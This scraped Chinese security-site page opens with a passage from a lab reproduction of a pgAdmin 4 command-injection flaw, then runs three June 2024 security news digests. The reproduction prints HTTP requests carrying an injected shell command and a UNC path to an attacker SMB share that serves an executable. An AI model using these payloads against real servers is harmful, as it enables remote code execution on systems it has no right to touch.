PGADMIN_LANGUAGE=en;pga4_session=bada494b-009f-4c04-bded-20497c5dcf74!pMVxVlI925/AqyV9Oq0RqiPecdo0fWg2hWYHxGDEpYc=; Connection: close Content-Type: application/json Content-Length: 33 {"utility_path":"a\";ifconfig;#"} import os binary_path = "a\";ifconfig;#" UTILITIES_ARRAY = ['pg_dump', 'pg_dumpall', 'pg_restore', 'psql'] for utility in UTILITIES_ARRAY:    full_path = os.path.abspath(        os.path.join(binary_path, (utility if os.name != 'nt' else (utility + '.exe')))   )    print(full_path) 我们简化代码在linux 下执行,最后利用; 分割执行命令 windows 下载软件并进行安装 https://ftp.postgresql.org/pub/pgadmin/pgadmin4/v5.7/windows/pgadmin4-5.7-x64.exe 我们发现同样在 windows 下拼接时是无法利用; 分割执行命令,但是可以通过 UNC path指定攻击者的恶意文件 import os binary_path = "\\\\192.168.222.1\\TMP\\" UTILITIES_ARRAY = ['pg_dump', 'pg_dumpall', 'pg_restore', 'psql'] for utility in UTILITIES_ARRAY:    full_path = os.path.abspath(        os.path.join(binary_path, (utility if os.name != 'nt' else (utility + '.exe')))   )    print(full_path) 我们发现通过构造传入参数,我们可以伪造共享地址 windows 下的环境始终无法启动 web 界面,因为环境实在太老了,启动 C:\Users\username\AppData\Local\Programs\pgAdmin 4\v5\web\setup.py 各种版本问题,一直没办法启动成功,所以只做理论上的验证 后来我发现安装完成之后,会在界面下提供一个python目录,所以直接选择该python 来启动项目,需要把C:\Users\username\AppData\Local\Programs\pgAdmin 4\v5\web 下的config.py 修改 DEFAULT_SERVER \= '0.0.0.0' 使用impacket提供的smbserver.py脚本构造恶意的smb服务 smbserver.py TMP /tmp 编译恶意的exe文件并放到对应目录 pip install pyinstaller type execute_calc.py import subprocess def execute_calc():    subprocess.call("calc.exe") if __name__ == "__main__":    execute_calc() pyinstaller --onefile execute_calc.py POST /misc/validate_binary_path HTTP/1.1 Host: 192.168.222.145:5050 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-pgA-CSRFToken: Ijg5MDJjOGQ2YmVlNTA1NDMwZjFmODA1ZWNjYTIyNzg5MjExM2EzNDci.Zi3CIg.9u2mEcj30C2tPX0soO3L7tJrp5w Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: pga4_session=9cd07409-7aca-46c3-8635-e615a7fcd4ac!lthUHprxGzxRdWMWfPm1VLDOLpk=; Connection: close Content-Type: application/json Content-Length: 45 {"utility_path":"\\\\192.168.222.128\\TMP\\"}   ‍
网络安全日报 2024年06月11日
1、黑客组织入侵迪士尼Confluence服务器并窃取2.5GB数据 https://www.bleepingcomputer.com/news/security/club-penguin-fans-breached-disney-confluence-server-stole-25gb-of-data/ 声称Club Penguin粉丝的黑客组织入侵了迪士尼的Confluence服务器,窃取了他们最喜欢游戏的信息,但最终得手的是2.5GB的内部公司数据。Club Penguin是一款于2005年至2018年间运营的多人在线游戏(MMO),玩家可以在虚拟世界中参与游戏、活动并与其他玩家聊天。该游戏最初由New Horizon Interactive创建,后来被 2、3.61亿被盗邮件账户在Telegram泄露并供公开检索 https://www.bleepingcomputer.com/news/security/361-million-stolen-accounts-leaked-on-telegram-added-to-hibp/ 一大批包含3.61亿个被盗电子邮件地址的数据已被添加到“Have I Been Pwned”数据泄露通知服务中,这些账户信息来自密码窃取恶意软件、凭证填充攻击和数据泄露。现在,任何人都可以检查他们的账户是否被泄露。网络安全研究人员从多个Telegram网络犯罪频道收集了这些凭证,这些频道通常泄露被盗数据以建立声誉和吸引订阅者。被盗数据通常以以下形式泄露:被盗数据通常以用户名和密 3、 研究人员发现Azure Service Tags服务存在严重漏洞 http://www.tenable.com/blog/these-services-shall-not-pass-abusing-service-tags-to-bypass-azure-firewall-rules-customer 安全研究人员发现了Azure Service Tags中的一个高严重性漏洞,可能允许攻击者访问客户的私人数据。Service Tags是特定Azure服务的IP地址组,用于防火墙过滤和基于IP的访问控制列表(ACLs),当需要网络隔离以保护Azure资源时使用。这是通过阻止传入或传出的互联网流量,仅允许Azure服务流量来实现的。威胁行为者可以利用该漏洞制作 4、SPECTR恶意软件针对乌克兰防御部队发起攻击 https://cert.gov.ua/article/6279600 乌克兰计算机应急响应小组(CERT-UA)警告称,针对该国防御部队的网络攻击使用了一种名为SPECTR的恶意软件,这是名为SickSync的间谍活动的一部分。该机构将这些攻击归因于一个被称为UAC-0020的威胁行为者,该行为者也被称为Vermin,被评估为与卢甘斯克人民共和国(LPR)的安全机构有关。LPR在2022年2月俄罗斯对乌克兰的军事入侵前几天被俄罗斯宣布为一个主权国家。攻击链始于包含一个RAR自解压存档文件的钓鱼电子邮件,该文件包含一个诱饵PDF文件、一个包含SPECTR负载的被木马化的SyncThing应用 5、黑客组织滥用BoxedApp商业打包软件规避恶意软件检测 https://research.checkpoint.com/2024/inside-the-box-malwares-new-playground/ 威胁行为者越来越多地滥用BoxedApp等合法且商业可用的打包软件以规避检测并分发远程访问木马和信息窃取者等恶意软件。绝大多数被归因的恶意样本针对金融机构和政府行业。以BoxedApp打包提交到Google拥有的VirusTotal恶意软件扫描平台的样本数量在2023年5月左右出现了激增,Israeli网络安全公司补充说,样本提交主要来自土耳其、美国、德国、法国和俄罗斯。通过这种方式分发的恶意软件家族包括Agent Tesla、AsyncR 6、Google Maps时间轴数据计划将存储于本地设备以保护隐私 https://blog.google/products/maps/updates-to-location-history-and-new-controls-coming-soon-to-maps/ Google宣布计划从2024年12月1日起将Maps时间轴数据存储在用户的设备上,而不是其Google账户中。这项变化最初由科技巨头在2023年12月宣布,伴随着启用位置历史记录时的自动删除控制更新,将其默认设置为三个月,而不是之前的18个月。顾名思义,Google Maps时间轴帮助用户跟踪路线、行程和他们曾到过的地方,假设启用了位置历史记录和Web与应用活动设置。但随着最新的更改以在用户设 7、PHP存在严重安全漏洞可导致远程代码执行 https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/ 有关影响PHP的新严重安全漏洞的详细信息已经出现,在某些情况下可以利用该漏洞实现远程代码执行。该漏洞被追踪为CVE-2024-4577,被描述为影响Windows操作系统上安装的所有PHP版本的CGI参数注入漏洞。这个缺陷可以绕过为另一个安全漏洞CVE-2012-1823设置的保护措施。在2024年5月7日负责任披露后,已经在PHP版本8.3.8、8.2.20和8.1.29中提供了 8、研究人员披露攻击者入侵并清除GitHub仓库进行勒索 https://www.bleepingcomputer.com/news/security/new-gitloker-attacks-wipe-github-repos-in-extortion-scheme/ 攻击者正在瞄准GitHub仓库,擦除其内容,并要求受害者通过Telegram联系获取更多信息。这场活动背后的威胁行为者,在Telegram上使用Gitloker的用户名并冒充网络事件分析师,很可能是使用被盗凭证入侵目标的GitHub账户。随后,他们声称窃取了受害者的数据,创建了一个备份,可以帮助恢复被删除的数据。然后,他们会重命名仓库,并添加一个README.me文件,指示受害者通 9、研究人员披露ExCobalt组织基于Go语言编写的GoRed后门 https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/ex-cobalt-go-red-tehnika-skrytogo-tunnelya/ 研究人员发现了一个之前未知的用Go语言编写的后门,我们将其归因于ExCobalt组织。ExCobalt是一个专注于网络间谍活动的网络犯罪组织,其成员至少自2016年起活跃,据信是臭名昭著的Cobalt组织的成员。Cobalt组织攻击金融机构以盗取资金,其显著特点是使用CobInt工具,而ExCobalt组织自2022年起开始使用该工具。研究人员与ExCobalt组织有关 10、纽约时报公司内部源代码和数据遭遇泄漏 https://www.bleepingcomputer.com/news/security/new-york-times-source-code-stolen-using-exposed-github-token/ 纽约时报公司确认,属于其的内部源代码和数据在2024年1月被从公司的GitHub代码库中盗取,并在4chan论坛上泄露。一名匿名用户周四在4chan上发布了一个包含被盗数据的273GB档案的种子文件。“基本上所有属于纽约时报公司的源代码,270GB。”4chan论坛帖子中写道。“总共有大约5千个代码库(其中不到30个是额外加密的),共计360万个文件,未压缩的tar格式。”威胁 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年06月07日
1、Zyxel发布针对EoL NAS设备固件的漏洞补丁 https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-in-nas-products-06-04-2024 Zyxel发布了安全更新,以解决其两个已达到寿命终止(EoL)状态的网络附加存储(NAS)设备中影响严重的漏洞。成功利用五个漏洞中的三个可能允许未经认证的攻击者在受影响的安装上执行操作系统(OS)命令和任意代码。受影响的型号包括运行版本V5.21(AAZF.16)C0及更早版本的NAS326,以及运行版本V5.21( 2、汽车零部件供应商Advance Auto Parts上亿客户数据泄露 https://www.bleepingcomputer.com/news/security/advance-auto-parts-stolen-data-for-sale-after-snowflake-attack/ 威胁行为者声称正在出售从领先的汽车售后市场零部件供应商Advance Auto Parts公司窃取的3TB数据,这些数据是在攻破该公司Snowflake账户后被盗取的。Advance Auto Parts在美国、加拿大、波多黎各、美属维尔京群岛、墨西哥和多个加勒比海岛经营着4,777家门店和320个Worldpac分支机构,并为1,152家独立拥有的Carquest门店提供 3、研究人员披露TargetCompany勒索软件的Linux变种 https://www.trendmicro.com/en_us/research/24/f/targetcompany-s-linux-variant-targets-esxi-environments.html 研究人员观察到TargetCompany勒索软件家族的新Linux变种,使用定制的shell脚本针对VMware ESXi环境投放和执行有效载荷。TargetCompany勒索软件操作也被称为Mallox、FARGO和Tohnichi,于2021年6月出现,主要针对台湾、韩国、泰国和印度的组织进行数据库攻击(MySQL、Oracle、SQL Server)。TargetCompa 4、RansomHub勒索软件针对全球医疗企业发起攻击 https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomhub-knight-ransomware 研究人员对一种名为RansomHub的新生勒索软件的分析表明,它是更新和改名后的Knight勒索软件,Knight勒索软件本身是另一种名为Cyclops的勒索软件的进化版本。Knight(也称为Cyclops 2.0)勒索软件首次出现在2023年5月,采用双重勒索策略,窃取和加密受害者的数据以获取经济利益。它在多个平台上运行,包括Windows、Linux、macOS、ESXi和Android。在RAMP 5、FBI 已获得超过 7,000 个 LockBit 勒索软件解密密钥 https://www.securityweek.com/fbi-says-it-has-7000-lockbit-ransomware-decryption-keys/ 联邦调查局一名官员周三表示,该机构已获得 7,000 多个 LockBit 勒索软件解密密钥,并敦促受害者与其联系。文件遭到 LockBit 3.0 勒索软件加密的实体也可以尝试使用日本警方开发的解密器来恢复他们的文件,该解密器可在 NoMoreRansom 项目的网站上找到。 6、Muhstik 僵尸网络利用RocketMQ 漏洞扩大 DDoS 攻击 https://thehackernews.com/2024/06/muhstik-botnet-exploiting-apache.html 名为Muhstik的分布式拒绝服务 (DDoS) 僵尸网络利用影响 Apache RocketMQ 的现已修补的安全漏洞来选择易受攻击的服务器并扩大其规模。 7、谷歌意外泄露内部文档,被指欺骗SEO行业多年 https://www.secrss.com/articles/66749 近日,由于谷歌内部机器人“误操作”,一批描述谷歌如何对网页排名的内部文档在线泄露。由于这些文档披露的搜索排名机制与谷歌公开发布的规则并不完全一致,一些知名SEO专家指责谷歌欺骗了整个行业多年。 8、Ariane Systems酒店自助入住系统存在漏洞可导致信息泄露 https://www.pentagrid.ch/en/blog/ariane-allegro-hotel-check-in-terminal-kios-escape/ 数千家酒店安装的Ariane Systems自助入住系统存在一个可绕过终端模式的漏洞,该漏洞可能允许访问客人的个人信息和其他房间的钥匙。这些终端允许客人自行预订和办理入住手续,通过POS子系统处理付款流程、打印发票并提供用作房间钥匙的RFID传感器。早在三月份,安全研究员发现,他可以轻松绕过他所住酒店自助入住终端上运行的Ariane Allegro Scenario Player的终端模式,并访问包含所有客户详细信息的底层W 9、Ticketmaster 信息泄露案Snowflake 或是泄密源头 https://www.freebuf.com/news/402774.html 安全研究人员表示,在云存储公司 Snowflake 数据泄露事件中,Ticketmaster 和其他多家机构的大量信息被盗。 10、伦敦国家医疗服务系统因勒索软件陷入瘫痪 https://hackread.com/london-nhs-ransomware-hospitals-targeted/ 该事件严重影响了医疗服务的提供,特别是输血和检验结果的提供,并导致医院无法连接到提供病理服务的私营公司的服务器。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年06月06日
1、俄罗斯电力公司及政府机构遭遇Decoy Dog木马攻击 https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/hellhounds-operation-lahat-part-2/ 俄罗斯的组织正遭遇网络攻击,这些攻击被发现是传递一种名为诱饵狗的Windows版本恶意软件。网络安全公司正在跟踪这一活动集群,名为“Operation Lahat”,并将其归因于一个名为“HellHounds”的高级持续威胁(APT)组织。HellHounds小组会攻破他们选择的组织并在其网络中隐藏多年未被发现。在此过程中,该小组利用了主要的入侵向量,从漏洞的Web服务到可信赖的关系。 2、Telerik报告产品漏洞可能允许恶意创建管理员账号 https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 Progress Software已经推出更新,以解决影响Telerik报告服务器的一个关键安全漏洞,该漏洞可能被远程攻击者利用绕过身份验证并创建恶意管理员用户。该问题被跟踪为CVE-2024-4358,具有最高10.0分中的CVSS评分9.8。该公司在一份咨询报告中表示:“在Progress Telerik报告服务器2024 Q1版本(10.0.24.305)或更早版本中,运行在IIS上,未经认证的攻击者可 3、美国无线电中继联盟ARRL称其遭遇网络攻击 https://www.arrl.org/news/arrl-systems-service-disruption 美国无线电中继联盟(ARRL)分享了有关5月份一起网络攻击的更多信息,该攻击使其“世界日志簿”(Logbook of the World)离线,并导致一些成员因信息不足。ARRL是美国的业余无线电全国协会,代表业余无线电的利益向政府监管机构反映,并为全国的爱好者推广活动和教育计划。5月16日,ARRL宣布其网络和总部系统遭遇了一起“涉及访问的严重事件”。由于ARRL没有提供进一步的信息,成员们对组织的透明度表示担忧。今天,ARRL终于分享了有关此次网络攻击的更多细节,称这次攻击 4、FBI警告称攻击者发布虚假远程工作广告诈骗加密货币 https://www.ic3.gov/Media/Y2024/PSA240604 FBI发出警告,称诈骗者利用虚假的远程工作广告,以合法公司招聘人员的身份,诱骗美国各地的求职者并窃取加密货币。这些在家工作的骗局旨在通过简单易完成的任务,如在线评价各种企业或“优化”某项服务,吸引潜在受害者。FBI警告称:“诈骗者冒充合法企业,如人力资源或招聘机构,可能通过未经请求的电话或消息联系受害者。”诈骗者设计了一个复杂的报酬结构,要求受害者支付加密货币才能赚更多的钱或‘解锁’工作,而这些支付直接进入诈骗者的口袋。为了使其欺诈计划更具说服力,诈骗者还会要求受害者使用一个虚假的门户网站,展示他们赚了多少钱 5、攻击者利用Excel宏在乌克兰发起多阶段恶意软件攻击 https://www.fortinet.com/blog/threat-research/menace-unleashed-excel-file-deploys-cobalt-strike-at-ukraine 研究人员观察到一场新的复杂网络攻击,目标是定位在乌克兰的终端,旨在部署Cobalt Strike并控制被攻破的主机。根据Fortinet FortiGuard Labs的报告,攻击链涉及一个嵌入VBA宏的Microsoft Excel文件以启动感染。安全研究员在周一的报告中表示:“攻击者使用多阶段恶意软件策略来传递臭名昭著的‘Cobalt Strike’有效载荷,并与命令与控制(C 6、TikTok 零日漏洞被利用,可劫持账户 https://www.bleepingcomputer.com/news/security/tiktok-fixes-zero-day-bug-used-to-hijack-high-profile-accounts/ 近日,攻击者利用社交媒体直接消息功能中的零日漏洞,劫持了多家知名公司和人物的TikTok 账户。TikTok发言人证实,索尼、希尔顿、美国有线电视新闻网(CNN)等用户的账户已遭到黑客劫持,为了防止被滥用被迫暂时删除。此次黑客攻击的程度还不得而知,但是TikTok发言人补充说,“被入侵的账户数量非常少”。在零日漏洞被修复之前,或将不会分享有关被利用漏洞的任何细节。 7、恶意软件可能会窃取 WINDOWS RECALL收集的数据 https://securityaffairs.com/164181/digital-id/malware-steal-data-windows-recall-tool.html 网络安全研究人员演示了恶意软件如何窃取新 Windows Recall 工具收集的数据。Microsoft Copilot+ 的 Recall 功能是一款人工智能工具,旨在帮助用户在 PC 上搜索过去的活动。该工具收集的数据在本地存储和处理。推出后,它引起了网络安全专家的安全和隐私担忧,因为它会扫描并保存计算机屏幕的定期截图,可能会泄露密码或财务信息等敏感数据。 8、思科解决了用于危害德国政府会议的 WEBEX 漏洞 https://securityaffairs.com/164173/breaking-news/cisco-webex-flaws-german-government-meetings.html 5月初,德国媒体Zeit Online披露,威胁行为者利用德国政府实施的思科Webex软件中的漏洞来访问内部会议。 思科称:“2024 年 5 月初,思科发现了 Cisco Webex Meetings 中的漏洞,我们现在认为这些漏洞被用于有针对性的安全研究活动,允许未经授权访问我们法兰克福数据中心托管的某些客户的 Cisco Webex 部署中的会议信息和元数据。这些错误已得到解决,并且截至 2 9、2024 年 6 月 Android 安全更新修复了 37 个漏洞 https://source.android.com/docs/security/bulletin/2024-06-01 Android 2024 年 6 月更新包含针对框架和系统组件中高严重性缺陷的补丁,解决了特权提升和信息泄露等问题。 10、微软将逐步弃用 Windows NTLM 身份验证协议 https://www.bleepingcomputer.com/news/microsoft/microsoft-deprecates-windows-ntlm-authentication-protocol/ 微软表示,目前仍广泛使用的 NTLM 协议自 6 月份起将不再开发,并将逐步淘汰,转而采用更安全的替代协议Kerberos。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页